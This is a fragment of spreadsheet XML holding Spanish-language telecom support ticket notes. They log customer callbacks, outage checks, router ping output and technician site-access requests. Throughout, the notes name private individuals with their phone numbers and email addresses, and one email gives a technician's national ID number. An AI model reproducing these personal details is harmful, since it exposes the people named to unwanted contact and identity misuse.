    <t>SE LLAMA A CLIENTE GERSON ESTURBA 55135087 MENCIONA QUE COMO A LAS 8:15 HRS PRESENTO VARIAS PERDIDAS DE PAQUETES PERO ACTUALMENTE EL SERVICIO ESTA ESTABLE
CLIENTE SOLICITA SE PUEDA ESTAR VALIDANDO DURANTE EL DIA PARA CONFIRMAR QUE NO PRESENTE CAIDAS
CLIENTE SOLICITA LLAMADA PARA LAS 11:00
-ID 2001291757</t>
  </si>
  <si>
    <t>F4577965</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
ASUNTO: RE: ENLACE MM LA CEIBA -D-43136
JURGEN RENE BOCH CAAL
BUEN DÍA,
ESTIMADO CLIENTE, POR ESTE MEDIO LE INFORMAMOS QUE TENEMOS PING HACIA LA IP WAN DEL EQUIPO CISCO, Y OBSERVAMOS EQUIPOS CONECTADOS POR PARTE DE SU RED LAN, SEGÚN VEMOS ESTE ES UN ENLACE DE DATOS Y NO UNO DE INTERNET, POR LO CUAL NO PODRÍA REALIZAR PRUEBAS HACIA LA IP  8.8.8.8, PERO PARA BRINDARLE SOPORTE NOS PODRÍA APOYAR BRINDANDO CUAL ES LA DIRECCION DE ORIGEN Y LA DIRECCIÓN DE DESTINO A LA CUAL USTED NECESITA LA CONECTIVIDAD PARA QUE VERIFIQUEMOS Y PODAMOS BRINDARLE APOYO. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
PING -VPN-INSTANCE INVERSIONESLAPAZ 10.1.241.26
  PING 10.1.241.26: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.1.241.26: BYTES=56 SEQUENCE=1 TTL=255 TIME=3 MS
    REPLY FROM 10.1.241.26: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.1.241.26: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.1.241.26: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.1.241.26: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
 --- 10.1.241.26 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS
.</t>
  </si>
  <si>
    <t>F4577966</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA RIOS ##NO CONTESTA ##
ENVIA A BUZON ##SE INTENTARA LUEGO
2001290029
COLA:
NOMBRE: A: 0050370281713
NÚMERO: 0050370281713
DURACIÓN: 0:00:28
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370281713
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 09:08:29</t>
  </si>
  <si>
    <t>CLIEINTE CLAUDIA RIOS CORTA LLAMADA- SE HA INTENTADO LOCALIZARLA 2 VECS ##ENVIA A BUZON ##
2001287625
COLA:
NOMBRE: A: 0050370281713
NÚMERO: 0050370281713
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 0050370281713
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 09:01:26
2001286848
COLA:
NOMBRE: A: 0050370281713
NÚMERO: 0050370281713
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370281713
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 09:00:49</t>
  </si>
  <si>
    <t xml:space="preserve"> CLAUDIA RIOS-70281713 COMENTA QUE AL LEVANTAR EL TELEFONO NO TIENE LLAAMDAS - SE REALIZA PRUEBAS, SE LLAMA AL GDN Y  CONTESTA ALATAGRACIA ##COMENTA QUE TODO EN SU AREA ESTA BIEN ##
RESULTADO: LLAMADA HECHA
NOMBRE: 0050370281713
NÚMERO: 0050370281713
INICIO: HOY, 08:52
FIN: HOY, 08:56
DURACIÓN: 3:52
ID DE LLAMADA: 2001284742</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA RIOS-70281713 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE REALIZA LLAMADA DE PRUEBA Y LA LLAMADA SI COMPLETA, CLIENTE CONFIRMA LA OPERATIVIDAD
-ID 2001303708
LLAMDA DE PRUEBA- 2001307680</t>
  </si>
  <si>
    <t>F4577968</t>
  </si>
  <si>
    <t>CLIENTE FRANKLIN RODRIGUEZ 59225702 SOLICITA SE LE LLAME EN 1 HORA YA QUE AÚN NO UBICAN UN CONTACTO EN ESTADOS UNIDOS PARA REALIZAR PRUEBAS. ID: 2001308816</t>
  </si>
  <si>
    <t>CLIENTE FRANKLIN RODRIGUEZ 59225702 COMENTA QUE NO HA UBICADO A OTRO CLIENTE CON EL INCONVENIENTE, SE LE INDICA QUE SU CLIENTE DEBE REPORTAR EL PROBLEMA CON SU OPERADORA LOCAL YA QUE SE DESCONOCE EL CARRIER QUE USA LA LLAMADA, ASÍ COMO LA CONFIGURACIÓN DE SU CLIENTE
A NIVEL DE CLARO SU E1 NO PRESENTA INCONVENIENTE. CLIENTE ESTÁ ENTERADO, SE COMUNICARÁ CON SU CLIENTE PARA BRINDARLE LA INFORMACIÓN. AUTORIZA EL CIERRE DEL CASO. ID:2001375310.</t>
  </si>
  <si>
    <t>FRANKLIN RODRIGUEZ 59225702 INFORMA QUE NO RECIBEN LLAMADAS INTERNACIONALES DESDE ESTADOS UNIDOS HACIA SU GDN, SE LE COMENTA QUE EN ESTE CASO ES DE VERIFICAR QUE DEL LADO DE ESTADOS UNIDOS NO SE TENGA BLOQUEO DE LLAMADAS SALIENTES, QUE SE ESTÉ MARCANDO EL NÚMERO DE FORMA CORRECTA Y QUE SE ESTÉ MARCANDO EL CODIGO DE SALIDA INTERNACIONAL. CLIENTE INDICA QUE NO SABE DESDE QUE NÚMERO ESTÁN MARCANDO, POR LO QUE UBICARÁ ALGUN CLIENTE DE ESTADOS UNIDOS PARA REALIZAR PRUEBAS, COMENTA QUE DEVOLVERÁ LA LLAMADA. ID DE LLAMADA: 2001287464</t>
  </si>
  <si>
    <t>CLIENTE FRANKLIN RODRIGUEZ 59225702 CONSIGUE UN CLIENTE QUIEN REALIZA PRUEBAS LLAMANDO DE LAS SIGUIENTES FORMAS
011 502 23831100 Y DE LA FORMA +502 23831100
PERO LAS LLAMADAS NO COMPLETAN, FRANKLIN INDICA QUE SU CLIENTE LES COLGÓ, EN CUANTO LO TENGAN EN LINEA NUEVAMENTE SE CONTINUARÁ REALIZANDO PRUEBA</t>
  </si>
  <si>
    <t>F4577969</t>
  </si>
  <si>
    <t>YA SE OBSERVA TRONCALES ACTIVAS
SE LLAMA AL GDN INGRESA LA LLAMADA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4577974</t>
  </si>
  <si>
    <t>VALIDA:  OSCAR RODAS DEL 41230521  CONFIRMA QUE CONTINUARA REVISANDO EL TEMA CON AREA RESPONSABLE DE LICENCIAS</t>
  </si>
  <si>
    <t>SE CONTACTA OSCAR RODAS DEL 41230521 ACTUALMENTE EN LLAMADA INFORMA QUE NO TIENEN SERVICIO DE INTERNET, SE LE INFORMA QUE HAY UN EQUIPO FORTINET CONECTADO, COMENTA QUE EL ESQUIPO ESTA CONTRATADO CON CLARO, POR TAL MOTIVO SE PROCEDE A SOLICITAR APOYO AL SOC. ID: 2001289307.</t>
  </si>
  <si>
    <t>F4578009</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO 24217006 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001319736</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO AL 24217006 SIGUE SIN  RESPONDER SE INTENTARA LUEGO **
ID 2001387729
**</t>
  </si>
  <si>
    <t>SE LLAMAA  CLEITNE RAUL ESTEFANO MURILLO 24217006  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001375388</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO AL 24217006  NO RESPONDE SE INTENTARA LUEGO **
ID 2001346997
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL ESTEFANO MURILLO AL 24217006  NO RESPONDE SE INTENTARA LUEGO **
ID 2001326944
**</t>
  </si>
  <si>
    <t>F4578014</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIRA CHAVAJAY 30836893 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001309539 - 2001310165</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE JAIRO ORELLANA 41840101 MENCIONA QUE SE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001321553</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIRA CHAVAJAY 30836893 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001320626</t>
  </si>
  <si>
    <t>F4578026</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BELVI HERNANDEZ 44902099 MENCIONA QUE EL SERVICIO SIGUE CAIDO Y QUE YA APLICARON REINICIO A LOS EQUIPOS INTERNOS, ADICIONAL MENCIONA QUE SE CONECTAN POR MEDIO DE WIFI, SE LE CONFIRMA QUE CLARO NO LE PROPORCIONA WIFI
SE LE MENCIONA QUE A NIVEL DE CLARO EL SERVICIO SE ENCUENTRA OPERATIVO Y ESTABLE
CLIENTE EN LLAMADA CONFIRMA QUE EL SERVICIO YA SE RESTABLECIO, SE LE HACE LA MENCION DE VALIDAR LOS EQUIPOS A NIVEL INTERNO
-ID 2001296859</t>
  </si>
  <si>
    <t>F4578027</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE 97225451 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001438997</t>
  </si>
  <si>
    <t>F4578030</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARLENI PORTILLO AL 77480081 INDICA QUE ESTA EN UNA REUNION SOLICITA QUE SE LE LLAME EN 1 HORA NUEVAMENTE **
ID 2001322186
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARLENI PORTILLO AL 77480081 INDICA UNIRA AL SEÑOR WILFREDO 70392970  A LA LLAMADA EL ESTA EN SITIO QUIEN IN INDICA QUE TIENE 0.32 MEGAS DE LOS 10 MG CONTRATADOS || SE NOTIFICA A GESTOR  **
ID 2001348165
**</t>
  </si>
  <si>
    <t>F4578031</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. TANIA SUAZO 89879981 INFORMA QUE DESDE AYER SE QUEDARON SIN ENLACE, LA ENERGIA EN SITIO ES INESTABLE, CLIENTE SE RETIRA A LAS 3PM.  ID: 2001311476.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TANIA SUAZO 89879981 MENCIONA QUE EL INCONVENIENTE DEL SERVICIO INICIO EL MIERCOLES
CLIENTE CONFIRMA QUE SIGUEN SIN ENERGIA ELECTRICA POR LO QUE SOLICITA LLAMADA PARA EL LUNES A LAS 8:30 HRS
-ID 2001675873</t>
  </si>
  <si>
    <t>F4578038</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO PINEDA AL 58347011  QUIEN INDICA QUE PARA LAS 13:00 HRS SOLICITO EL MONITOREO **
ID 2001342139
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO PINEDA AL 58347011 CLIENTE CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET**
ID 2001386747
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 58347011 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO. SE PIDE APOYO A CNOC CLARO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4578050</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA VALIDANDO PRUEBAS
2001300889
COLA:
NOMBRE: A: 79248420
NÚMERO: 79248420
DURACIÓN: 0:01:25
ESTADO: CONECTADA
DETALLES: 79248420
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 26/05/2022 09:37:54</t>
  </si>
  <si>
    <t>*** SE HABLA CON TÉCNICO LUIS MEJÍA 58265113 (ID 2001356924), INDICA QUE NO TIENE ACCESOS Y QUE CLIENTE COMENTA QUE NO TIENEN CORREO DE CNETRAL. SE ENVÍA INFORMACIÓN A CLIENTE Y TÉCNICO HACE CONFERENCIA CON CENTRAL QUIEN RECIBE EL CORREO CLIENTE JOSE Y CONFIRMA QUE EN 5 MIN PUEDEN SOLICITAR EL INGRESO ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 12:06
PARA: JOSE.CHACON@BANCOINMOBILIARIO.COM.GT &lt;JOSE.CHACON@BANCOINMOBILIARIO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: BANCO INMOBILIARIO, S.A. -- 8000082T -- FLORES PETEN
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, FAVOR DE SU APOYO EN GESTIONAR ACCESOS PARA EL PERSONAL DESCRITO A CONTINUACIÓN:
 MEJÍA ALCARÁZ LUIS JOSÉ	DPI	1874431651705
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE SANDRA, APLICA REINICIO AL CTC, INDICA ESTADO DE LUCES LED LUEGO DEL REINICIO EN ESTADO PWR =VERDE, LINK1=APAGA, LINK 2 = APAGADO, POR LO QUE SE COORIDINARA VISITA.
CONFIRMA LOS DATOS:
UBICACION: 4 CALLE 5-14 Z.1 SANTA ELENA FLORES PETEN
PERMISOS: SOLO IDENTIFICAS
HORARIO DE ATENCION: 9:00 A 17:00 HRAS
CONTACTO EN SITIO: SANDRA 79248420 / 79248422
2001303356
COLA:
NOMBRE: A: 50172865
NÚMERO: 50172865
DURACIÓN: 0:07:07
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50172865
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 26/05/2022 09:49:27</t>
  </si>
  <si>
    <t>F4578054</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE, PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR RAMOS.MARLON POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4578065</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE QUIÑONES AL 41512784 E INDICA QUE LA LAN QUE OBSERVA CAIDA ES LA LAN 192.168.191.134 Y 54 || SE NOTIFICA A GESTOR **
ID 2001330396
**</t>
  </si>
  <si>
    <t>F4578070</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  CLIENTE MARIO 47582756 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001333429
**</t>
  </si>
  <si>
    <t>EN SEGUIMIENTO A CRONOLOGÍA DE LA FALLA AUN NO SE TIENE EL CONTACTO CON EL PR POR LO QUE SE TRATA DE CONTACTAR NUEVAMENTE A MARIO REYNA AL 47582756 ID 2001361545 / 2001361850 DONDE ATIENDEN Y COMENTA QUE SE LLAMA A LA POLICÍA NACIONAL CIVIL,  SE LE COMENTA EL INFORME DEL TICKET Y RAZÓN POR LA QUE SE CONTACTA Y SE PREGUNTA POR MARIO REYNA Y NO DA RAZÓN Y SOLICITA TIEMPO EN ESPERA Y COMENTA QUE NO ESTA EN EL PR Y QUE BRINDARA EL CONTACTO DE JARDY GIRON Y SE PUEDEN CONTACTAR AL 58196362 EL CUAL SE LE CONTACTA ID 2001363418 / 2001363559 SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE SE ENCUENTRA EN EL SITIO Y NO TIENE SERVICIO, SE TRANSFIERE CON EL GESTOR A CARGO GERSON.AJPACAJA AL 8126 ID 2001364386 ATIENDE WAGNER POLANCO Y COMENTA QUE VA A TRANSFERIR CON EL GESTOR QUIEN YA SE TIENE EN LINEA, SE LE COMENTA Y SE DEJA CON EL PR EN LINEA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  CLIENTE MARIO 47582756 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001353191
**</t>
  </si>
  <si>
    <t>F4578077</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARDOQUEO ORTEGA AL 54251585  NO RESPONDE, SE INTENTARA LUEGO **
ID 2001335363
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARDOQUEO ORTEGA AL 54251585  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001354022
**</t>
  </si>
  <si>
    <t>F4578085</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30246026 RESPONDE NATALI MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 2001312528 - 2001314655</t>
  </si>
  <si>
    <t>F4578096</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  CLAUDIA RIVAS AL 70281713 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001336939
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA RIVAS AL 70281713 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001317580
**</t>
  </si>
  <si>
    <t>F4578098</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A GERALD TORRES/CLIENTE; SE LE INFORMA ENLACE OK, ÉSTE INDICA QUE HARÁ SUS PRUEBAS INTERNAS; SE LE PIDE QUE LAS COMPARTA SIGUIENDO LA SECUENCIA DEL CORREO.</t>
  </si>
  <si>
    <t>F4578103</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN HERRERA 36894258 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001443476</t>
  </si>
  <si>
    <t>F4578112</t>
  </si>
  <si>
    <t>SE VUELVE A MARCAR, QUIEN RESPONDE INDICA QUE COMUNICARÁ AL AREA Y LUEGO CORTA LA LLAMADA.
2001323254
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 26/05/2022 10:34:30</t>
  </si>
  <si>
    <t>F4578115</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DE JOSYUE HERRARA, CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT, SE NOTIFICA A WAGNER.POLANCO VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4578120</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEJANDRA SICAN 59305744  PERO NO SE TIENE RESPUESTA, SE INTENTARA EN UNOS INSTANTES
2001326711
COLA:
NOMBRE: A: 59305744
NÚMERO: 59305744
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:38
DETALLES: 59305744
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 26/05/2022 10:43:25
2001326919
COLA:
NOMBRE: A: 59305744
NÚMERO: 59305744
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:35
DETALLES: 59305744
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 26/05/2022 10:43:33</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRA SICAN 59305744 PARA BRINDAR RETROALIMENTACION
-ID 2001376919</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEJANDRA SICAN 59305744 CONFIRMA QUE EL SERVICIO ESTA ACTIVO, SE PROCEDE AL CIERRE DEL TICKET
LLAMADA REALIZADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4578122</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DRA. JESSICA GARCÍA 61184123 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001333883</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DRA. JESSICA GARCÍA 61184123 MENCIONA QUE AUN PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001411531</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DRA. JESSICA GARCÍA AL 61184123 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001382745
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DRA. JESSICA GARCÍA AL 61184123 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001354359 - 2001354546
**</t>
  </si>
  <si>
    <t>F4578145</t>
  </si>
  <si>
    <t>CLIENTE JOSÉ ARIAS-78556163 INDICA QUE TUVIERON PROBLEMAS EN EL SECTOR PERO YA TODO OK ##VALIDA##
2001338319
COLA:
NOMBRE: A: 0050378556163
NÚMERO: 0050378556163
DURACIÓN: 0:02:08
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378556163
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 26/05/2022 11:14:50</t>
  </si>
  <si>
    <t>F4578147</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR JIMENEZ 52347563 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 20013382207</t>
  </si>
  <si>
    <t>SR. CLIENTE OSCAR JIMENEZ 52347563 CONFIRMA QUE AHORA YA OBSERVA NORMALIZADO EL ENLACE, AUTORIZA CIERRE, DE PRESENTARSE OTRO INCIDENTE LO REPORTARA.
CC_LAVANDERIA_EL_SIGLO_GT_INTERNET_ZONA_4#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1059000       144    791000       129         0
* FASTETHERNET2                 0         0         0         0      1000         1      1000         2         0
  GIGABITETHERNET0              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET1              0         0         0         0         0         0         0         0         0
* GIGABITETHERNET2              0         0         0         0    796000       131   1056000       145         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* NVI0                          0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0   1052000       141    785000       125         0
CC_LAVANDERIA_EL_SIGLO_GT_INTERNET_ZONA_4#PING 1.1.1.1 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.2.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 28/30/32 MS</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO SE GESTIONO LA LLAMADA QUE COMENTO EL GESTOR  JOSE.OCHOA Y CAMBIARON DE ASIGNACIÓN POR TAL RAZON NO HAY NADA PENDIENTES POR PARTE DEL CLIENTE SE MUEVE A WIP Y SE NOTIFICA AL GESTOR AHORA ACARGO WAGNER.POLANCO VIA SKYPE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KATERIN VALLE 22472222 MENCIONA QUE EL SERVICIO ES INESTABLE
 SE LE CONSULTA TEMA DE ENERGIA Y MENCIONA QUE TODO ESTA BIEN, SE CONSULTA SI APLICARON REINICIO PERO NO TIENE ESTA INFORMACION POR LO QUE SOLICITA SE HABLE CON OSCAR JIMENEZ 52347563
-ID 2001336710</t>
  </si>
  <si>
    <t>F4578148</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 86276897/MAURICIO MENCIONA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE PERO EN LO QUE VA DE LA MAÑANA HA PRESENTADO VARIAS CAIDAS, ALGUNAS FUERON EN EL HORARIO DE 8:30 Y 9:30
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001341934</t>
  </si>
  <si>
    <t>F4578149</t>
  </si>
  <si>
    <t>CLIENTE MARIA ISABEL 57151546 REALIZA PRUEBAS Y VALIDA EL E1 OPERATIVO. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 2001330495</t>
  </si>
  <si>
    <t>F4578156</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENE SR. JOSE 44566056 ACTUALMENTE PROCEDE CON PRUEBAS, PROCEDE A BUSCAR CTC UNION ...</t>
  </si>
  <si>
    <t>F4578162</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25069510 MENCIONA QUE PRESENTARON CAIDAS A LAS 14:07 POR LO QUE SE NOTIFICARA PAR EL SEGUIMIENTO
-ID 2001415061</t>
  </si>
  <si>
    <t>F4578169</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE YA REINICIARN EL EQUIPO ASMI 54L QUE SE ENCUENTRA EN LAS INSTALACIONES, CLIENTE NOS CONFIRMA QUE SE ENCUENTRA ALARMADO (PWR - VERDE SYNC A - ROJO ALM- ROJO) CLIENTE TAMBIEN NOS CONFIRMA QUE YA REINICIARON EL EQUIPO AETHRA PERO QUE EL SERVICIO NO RESTABLECE, SE LE INDICA QUE SE ENVIARA PERSONAL TECNICO A VERIFICAR PERO SE ESTARA SOLICITANDO PERMISOS A CENTRAL PARA EL INGRESO A LA AGENCIA, CLIENTE QUEDA ENTERADO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA INFORMACION AL CLIENTE, A LA ESPERA QUE NOS APOYE CON TRAMITAR PERMISOS PARA EL LISTADO DE LOS TECNICOS
YA QUE SE TIENEN VARIOS REPORTES Y SE ENCUENTRAN ATENDIENDO PERSONAL DE CAMPO
F4578169 / SD1129286 / GDN 22160200 / BANCO INDUSTRIAL.- AVENIDA PETAPA 51-57 ZONA 12 BANCO INDUSTRIAL C.C. ATANASIO TZUL, LOCAL 71 /
MONICA YIREH CASTILLO POON
BUENAS TARDES SR. DAVID SIC,
LE COMENTO QUE ACTUALMENTE NO SE TIENE LA INFORMACIÓN DE LA DISPONIBILIDAD DE LOS TÉCNICOS PARA INDICARLES QUIENES SE ESTARÍAN PRESENTANDO DEL LISTADO, POR LO QUE REQUERIMOS DE SU APOYO TRAMITANDO PERMISOS PARA EL LISTADO ADJUNTO Y AL TENER LA INFORMACIÓN DE LA PERSONA QUE NOS ESTARÁ APOYANDO SE LES ESTARÁ NOTIFICANDO.
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DAVID SIC, QUIEN INDICA QUE EN EL LISTADO VAN MUCHOS TECNICOS Y SOLICITA QUE SOLO SEAN 3 TECNICOS.
SE PROCEDE A CONSULTAR CON EL SUP RONALD.
2001426330
COLA:
NOMBRE: A: 56956052
NÚMERO: 56956052
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: 56956052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 15:34:24</t>
  </si>
  <si>
    <t>SE HABLA CON RONALD VELASQUEZ QUIEN COMENTA QUE AHORITA NO HAY TECNICOS DISPONIBLES PARA CONFIRMAR QUIEN APOYARA CON LA REVISION DEL SERVICIO, SE LE INDICARA AL CLIENTE EL MOTIVO Y QUE NOS PUEDAN APOYAR CON EL TRAMITE DE PERMISOS PARA TODOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIO CORREO NUEVAMENTE CON LOS ACCESOS QUE EL CLIENTE SOLICITO. SE COLOCARON SOLO DOS TECNICOS. QUIENES YA VAN EN CAMINO.
EL TICKET ESTARA EN PENDIENTE CLIENTE HASTA QUE LOS TECNICOS LOGREN INGRESAR.
HUGO JOSE SOTO SAMAYOA
BUENAS TARDES,
ADJUNTO ARCHIVO DE LOS TECNICOS ASIGNADOS.
ESTOS YA VAN DE CAMINO HACIA LA AGENCIA.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DAVID SIC, QUIEN INDICA QUE DARA SEGUIMIENTO.
2001446077
COLA:
NOMBRE: A: 56956052
NÚMERO: 56956052
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 56956052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 16:36:32</t>
  </si>
  <si>
